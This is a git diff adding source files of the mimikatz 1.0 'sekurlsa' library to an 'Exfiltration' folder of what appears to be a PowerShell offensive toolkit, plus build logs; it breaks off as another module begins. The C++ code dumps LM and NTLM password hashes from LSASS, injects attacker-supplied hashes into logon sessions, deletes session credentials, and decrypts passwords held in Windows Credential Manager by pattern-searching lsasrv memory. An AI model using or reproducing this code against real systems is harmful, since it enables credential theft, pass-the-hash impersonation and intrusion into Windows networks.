diff options
Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa')
35 files changed, 1771 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp new file mode 100644 index 0000000..b429e5a --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp @@ -0,0 +1,153 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "msv1_0.h" + +bool searchMSVFuncs() +{ + if(!MSV1_0_MspAuthenticationPackageId) + MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3; + return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0)); +} + +bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) +{ + wostringstream maReponse; + if(searchMSVFuncs()) + { + unsigned short reservedSize = 0; + PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL; + if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize))) + { + wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword)); + wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword)); + + if(justSecurity) + maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; + else + { + maReponse << endl << + L"\t * Utilisateur : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl << + L"\t * Domaine : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl << + L"\t * Hash LM : " << lmHash << endl << + L"\t * Hash NTLM : " << ntHash; + } + SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds); + } + else maReponse << L"n.t. (LUID KO)"; + } + else maReponse << L"n.a. (msv KO)"; + + return sendTo(monPipe, maReponse.str()); +} + +__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; + monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); + return getLogonData(monPipe, mesArguments, &monProvider); +} + +__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream maReponse; + if(searchMSVFuncs()) + { + if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2) + { + wstring idSecAppHigh = L"0"; + wstring idSecAppLow = mesArguments->front(); + if(mesArguments->size() > 1) + { + idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back(); + } + + LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); + if(idApp.LowPart != 0 || idApp.HighPart != 0) + maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des données de sécurité réussie :)" : L"Suppression des données de sécurité en échec :("); + else maReponse << L"LUID incorrect !"; + } + else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow"; + } + else maReponse << L"n.a. (msv KO)"; + + maReponse << endl; + return sendTo(monPipe, maReponse.str()); +} + +__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream maReponse; + if(searchMSVFuncs()) + { + if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6) + { + MSV1_0_PRIMARY_CREDENTIAL kiwicreds; + RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL)); + + wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back(); + kiwicreds.LmPasswordPresent = FALSE; + kiwicreds.NtPasswordPresent = TRUE; + + switch(mesArguments->size()) // méchants arguments utilisateurs + { + case 4: + idSecAppLow = mesArguments->front(); + userName = mesArguments->at(1); + domainName = mesArguments->at(2); + break; + case 6: + idSecAppHigh = mesArguments->front(); + idSecAppLow = mesArguments->at(1); + userName = mesArguments->at(2); + domainName = mesArguments->at(3); + kiwicreds.LmPasswordPresent = TRUE; + lmHash = mesArguments->at(4); + break; + case 5: + if(mesArguments->at(3).size() == 0x20) + { + idSecAppLow = mesArguments->front(); + userName = mesArguments->at(1); + domainName = mesArguments->at(2); + kiwicreds.LmPasswordPresent = TRUE; + lmHash = mesArguments->at(3); + } + else + { + idSecAppHigh = mesArguments->front(); + idSecAppLow = mesArguments->at(1); + userName = mesArguments->at(2); + domainName = mesArguments->at(3); + } + break; + } + + LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); + + if(idApp.LowPart != 0 || idApp.HighPart != 0) + { + if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN) + { + mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName); + mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine); + if(kiwicreds.LmPasswordPresent) + mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword); + mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword); + + maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de données de sécurité réussie :)" : L"Injection de données de sécurité en échec :("); + } + else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractères, le nom d\'utilisateur et le domaine/poste au maximum 22 caractères"; + } + else maReponse << L"LUID incorrect !"; + } + else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM"; + } + else maReponse << L"n.a. (msv KO)"; + + maReponse << endl; + return sendTo(monPipe, maReponse.str()); +} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h new file mode 100644 index 0000000..4749573 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h @@ -0,0 +1,16 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "../sekurlsa.h" +#include "msv1_0_helper.h" + +bool searchMSVFuncs(); +bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); + +__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments); +__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); +__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp new file mode 100644 index 0000000..7ccb8e5 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp @@ -0,0 +1,53 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "msv1_0_helper.h" +DWORD MSV1_0_MspAuthenticationPackageId = 0; + +void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) +{ + if(String->Buffer) + String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress))); +} + +NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize) +{ + STRING PrimaryKeyValue, CredentialString; + mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); + + NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName); + NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName); + CredentialString.Buffer = reinterpret_cast<char *>(Credential); + CredentialString.MaximumLength = CredentialString.Length = CredentialSize; + SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length); + return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString ); +} + +NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize) +{ + ULONG QueryContext = 0, PrimaryKeyLength; + STRING PrimaryKeyValue, CredentialString; + mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); + + NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString); + if(NT_SUCCESS(retour)) + { + SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length); + *Credential = (PMSV1_0_PRIMARY_CREDENTIAL) CredentialString.Buffer; + NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false); + NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false); + if (CredentialSize) + *CredentialSize = CredentialString.Length; + } + return retour; +} + +NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId) +{ + STRING PrimaryKeyValue; + mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); + return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue); +}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h new file mode 100644 index 0000000..e9afd03 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h @@ -0,0 +1,28 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "../sekurlsa.h" + +#define MSV1_0_PRIMARY_KEY "Primary" +extern DWORD MSV1_0_MspAuthenticationPackageId; + +typedef struct _MSV1_0_PRIMARY_CREDENTIAL { + LSA_UNICODE_STRING LogonDomainName; + LSA_UNICODE_STRING UserName; + BYTE NtOwfPassword[0x10]; + BYTE LmOwfPassword[0x10]; + BOOLEAN NtPasswordPresent; + BOOLEAN LmPasswordPresent; + wchar_t BuffDomaine[MAX_DOMAIN_LEN]; + wchar_t BuffUserName[MAX_USERNAME_LEN]; +} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; + +void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); + +NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize); +NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize); +NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog Binary files differnew file mode 100644 index 0000000..af1843d --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog Binary files differnew file mode 100644 index 0000000..065c191 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog Binary files differnew file mode 100644 index 0000000..662e27d --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog new file mode 100644 index 0000000..46b134b --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog @@ -0,0 +1 @@ +ÿþ
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog new file mode 100644 index 0000000..46b134b --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog @@ -0,0 +1 @@ +ÿþ
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog Binary files differnew file mode 100644 index 0000000..8bfc485 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog Binary files differnew file mode 100644 index 0000000..a090f02 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog Binary files differnew file mode 100644 index 0000000..3c62e5a --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog Binary files differnew file mode 100644 index 0000000..a61d64e --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog Binary files differnew file mode 100644 index 0000000..c2411f0 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog Binary files differnew file mode 100644 index 0000000..0c67d61 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog Binary files differnew file mode 100644 index 0000000..52d7b3d --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog Binary files differnew file mode 100644 index 0000000..465eb7a --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog Binary files differnew file mode 100644 index 0000000..9befde9 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest new file mode 100644 index 0000000..ecea6f7 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest @@ -0,0 +1,10 @@ +<?xml version='1.0' encoding='UTF-8' standalone='yes'?> +<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> + <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> + <security> + <requestedPrivileges> + <requestedExecutionLevel level='asInvoker' uiAccess='false' /> + </requestedPrivileges> + </security> + </trustInfo> +</assembly> diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate new file mode 100644 index 0000000..4d28193 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate @@ -0,0 +1,2 @@ +#v4.0:v100 +Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res Binary files differnew file mode 100644 index 0000000..d0ba1dd --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog new file mode 100644 index 0000000..929c472 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog @@ -0,0 +1,5 @@ +^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\sekurlsa\sekurlsa.vcxproj +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp new file mode 100644 index 0000000..fe846b4 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp @@ -0,0 +1,180 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "credman.h" + +PCRED_I_ENUMERATE CredIEnumerate = NULL; + +bool searchCredmanFuncs() +{ +#ifdef _M_X64 + BYTE PTRN_WIN5_CrediEnumerate[] = {0x48, 0x8b, 0xc4, 0x48, 0x81, 0xec, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x70, 0xe8, 0x48, 0x89, 0x78, 0xe0, 0x4c, 0x89, 0x60, 0xd8, 0x45, 0x33, 0xe4}; + LONG OFFS_WIN5_CrediEnumerate = 0; + BYTE PTRN_WNO8_CrediEnumerate[] = {0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; + LONG OFFS_WNO8_CrediEnumerate = -22; + BYTE PTRN_WIN8_CrediEnumerate[] = {0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; + LONG OFFS_WIN8_CrediEnumerate = -30; +#elif defined _M_IX86 + BYTE PTRN_WIN5_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x24, 0x53, 0x33, 0xdb, 0x57, 0x33, 0xc0}; + BYTE PTRN_WN60_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x40, 0x33, 0xc9}; + BYTE PTRN_WN61_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x44, 0x33, 0xc0}; + BYTE PTRN_WN62_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x33, 0xc0}; + LONG OFFS_WALL_CrediEnumerate = 0; +#endif + + if(!CredIEnumerate) + { + PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; +#ifdef _M_X64 + if(mod_system::GLOB_Version.dwMajorVersion < 6) + { + pattern = PTRN_WIN5_CrediEnumerate; + taille = sizeof(PTRN_WIN5_CrediEnumerate); + offset = OFFS_WIN5_CrediEnumerate; + } + else + { + if (mod_system::GLOB_Version.dwMinorVersion < 2) + { + pattern = PTRN_WNO8_CrediEnumerate; + taille = sizeof(PTRN_WNO8_CrediEnumerate); + offset = OFFS_WNO8_CrediEnumerate; + } + else + { + pattern = PTRN_WIN8_CrediEnumerate; + taille = sizeof(PTRN_WIN8_CrediEnumerate); + offset = OFFS_WIN8_CrediEnumerate; + } + } +#elif defined _M_IX86 + if(mod_system::GLOB_Version.dwMajorVersion < 6) + { + pattern = PTRN_WIN5_CrediEnumerate; + taille = sizeof(PTRN_WIN5_CrediEnumerate); + } + else + { + if(mod_system::GLOB_Version.dwMinorVersion < 1) + { + pattern = PTRN_WN60_CrediEnumerate; + taille = sizeof(PTRN_WN60_CrediEnumerate); + } + else if (mod_system::GLOB_Version.dwMinorVersion < 2) + { + pattern = PTRN_WN61_CrediEnumerate; + taille = sizeof(PTRN_WN61_CrediEnumerate); + } + else + { + pattern = PTRN_WN62_CrediEnumerate; + taille = sizeof(PTRN_WN62_CrediEnumerate); + } + } + offset = OFFS_WALL_CrediEnumerate; +#endif + mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&CredIEnumerate), L"lsasrv", pattern, taille, offset, NULL, true, true); + } + return (searchLSAFuncs() && CredIEnumerate); +} + +__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream monStream; + monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchCredmanFuncs() ? L"OK :)" : L"KO :(") << endl << endl << + L"@CredIEnumerate = " << CredIEnumerate << endl << + L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl; + return sendTo(monPipe, monStream.str()); +} + +__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; + monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getCredmanData, wstring(L"credman"))); + return getLogonData(monPipe, mesArguments, &monProvider); +} + +bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) +{ + wostringstream message; + if(searchCredmanFuncs()) + { + DWORD credNb = 0; + PCREDENTIAL * pCredential = NULL; + DWORD CredIEnumerateFlags = (mod_system::GLOB_Version.dwMajorVersion < 6) ? 0 : CRED_ENUMERATE_ALL_CREDENTIALS; + NTSTATUS status = (mod_system::GLOB_Version.dwBuildNumber < 8000 ) ? CredIEnumerate(logId, 0, NULL, CredIEnumerateFlags, &credNb, &pCredential) : reinterpret_cast<PCRED_I_ENUMERATE62>(CredIEnumerate)(logId, NULL, CredIEnumerateFlags, &credNb, &pCredential); + + if(NT_SUCCESS(status)) + { + for(DWORD i = 0; i < credNb; i++) + { + wstring Target(pCredential[i]->TargetName); + wstring ShortTarget = (mod_system::GLOB_Version.dwMajorVersion < 6) ? Target : Target.substr(Target.find_first_of(L'=') + 1); + + message << endl; + if(justSecurity) + message << L"\t [" << i << L"] " << Target << L'\t'; + else message << + L"\t * [" << i << L"] Target : " << Target << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl << + L"\t * [" << i << L"] Comment : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl << + L"\t * [" << i << L"] User : " << (pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>") << endl; + + if((pCredential[i]->Type != CRED_TYPE_GENERIC) && (pCredential[i]->Type != CRED_TYPE_GENERIC_CERTIFICATE)) + { + CREDENTIAL_TARGET_INFORMATION mesInfos = {const_cast<wchar_t *>(ShortTarget.c_str()), NULL, NULL, NULL, NULL, NULL, NULL, pCredential[i]->Flags, 0 , NULL}; + DWORD dwNbCredentials; + PENCRYPTED_CREDENTIALW * pEncryptedCredential; + NTSTATUS status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); + if(status == STATUS_INVALID_PARAMETER) + { + mesInfos.Flags |= CRED_TI_USERNAME_TARGET; + status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); + } + if(NT_SUCCESS(status)) + { + for(DWORD j = 0; j < dwNbCredentials ; j++) + { + wostringstream prefix; prefix << L"[" << j << L"] "; + message << descEncryptedCredential(pEncryptedCredential[j], justSecurity, prefix.str()); + } + SeckPkgFunctionTable->CrediFreeCredentials(dwNbCredentials, pEncryptedCredential); + } + else message << L"Erreur CrediReadDomainCredentials : " << mod_system::getWinError(false, status); + } + else + { + PENCRYPTED_CREDENTIALW pEncryptedCredential; + NTSTATUS status = SeckPkgFunctionTable->CrediRead(logId, CREDP_FLAGS_IN_PROCESS, const_cast<wchar_t *>(ShortTarget.c_str()), pCredential[i]->Type, 0, &pEncryptedCredential); + if(NT_SUCCESS(status)) + { + message << descEncryptedCredential(pEncryptedCredential, justSecurity); + CredFree(pEncryptedCredential); + } + else message << L"Erreur CrediRead : " << mod_system::getWinError(false, status); + } + } + CredFree(pCredential); + } + else message << L"CredIEnumerate KO : " << mod_system::getWinError(false, status); + } else message << L"n.a. (credman KO)"; + return sendTo(monPipe, message.str()); +} + +wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix) +{ + wostringstream monStream; + + LSA_UNICODE_STRING encryptedPassword = {pEncryptedCredential->Cred.CredentialBlobSize, pEncryptedCredential->Cred.CredentialBlobSize, reinterpret_cast<PWSTR>(pEncryptedCredential->Cred.CredentialBlob)}; + wstring cred = getPasswordFromProtectedUnicodeString(&encryptedPassword); + + if(justSecurity) + monStream << L"- {" << pEncryptedCredential->Cred.UserName << L" ; " << cred << L" } "; + else monStream << + L"\t " << prefix << L"User : " << pEncryptedCredential->Cred.UserName << endl << + L"\t " << prefix << L"Cred : " << cred << endl; + + return monStream.str(); +}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h new file mode 100644 index 0000000..60d1249 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h @@ -0,0 +1,19 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "../sekurlsa.h" + +bool searchCredmanFuncs(); +__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); +__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments); +bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); + +wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix = L""); + +typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE) (IN PLUID pLUID, IN DWORD unk0, IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials); +typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE62) (IN PLUID pLUID, IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials); + diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp new file mode 